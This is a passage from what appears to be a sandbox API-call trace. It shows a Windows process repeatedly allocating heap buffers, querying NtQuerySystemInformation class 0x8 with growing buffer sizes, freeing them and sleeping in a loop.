(in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0243.849] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.850] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.850] Sleep (dwMilliseconds=0x110) [0243.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0243.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0243.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0243.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0243.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0243.864] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0243.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0243.865] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0243.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.866] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.866] Sleep (dwMilliseconds=0x110) [0243.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0243.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0243.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0243.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0243.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0243.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0243.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0243.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0243.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.881] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.881] Sleep (dwMilliseconds=0x110) [0243.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0243.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0243.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0243.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0243.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0243.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0243.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0243.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0243.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.895] Sleep (dwMilliseconds=0x110) [0243.903] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0243.903] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0243.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0243.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0243.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0243.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0243.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0243.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0243.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.906] Sleep (dwMilliseconds=0x110) [0243.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0243.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0243.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0243.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0243.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0243.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0243.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0243.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0243.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.938] Sleep (dwMilliseconds=0x110) [0243.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0243.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0243.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0243.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0243.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0243.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0243.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0243.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0243.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.954] Sleep (dwMilliseconds=0x110) [0243.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0243.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0243.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0243.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0243.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0243.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0243.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0243.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0243.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.973] Sleep (dwMilliseconds=0x110) [0243.981] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0243.981] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.982] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0243.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0243.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0243.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0243.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0243.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0243.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0243.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.985] Sleep (dwMilliseconds=0x110) [0244.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0244.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0244.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0244.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0244.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0244.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0244.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0244.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0244.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.006] Sleep (dwMilliseconds=0x110) [0244.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0244.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0244.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0244.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0244.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0244.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0244.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0244.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0244.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.017] Sleep (dwMilliseconds=0x110) [0244.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0244.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0244.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0244.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0244.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0244.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0244.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0244.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0244.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.034] Sleep (dwMilliseconds=0x110) [0244.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0244.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0244.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0244.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0244.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0244.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0244.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0244.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0244.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.050] Sleep (dwMilliseconds=0x110) [0244.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0244.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0244.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0244.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0244.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0244.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0244.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0244.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0244.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.065] Sleep (dwMilliseconds=0x110) [0244.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0244.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0244.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0244.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0244.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0244.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.083] HeapFree (in: hHeap=0x2560000, 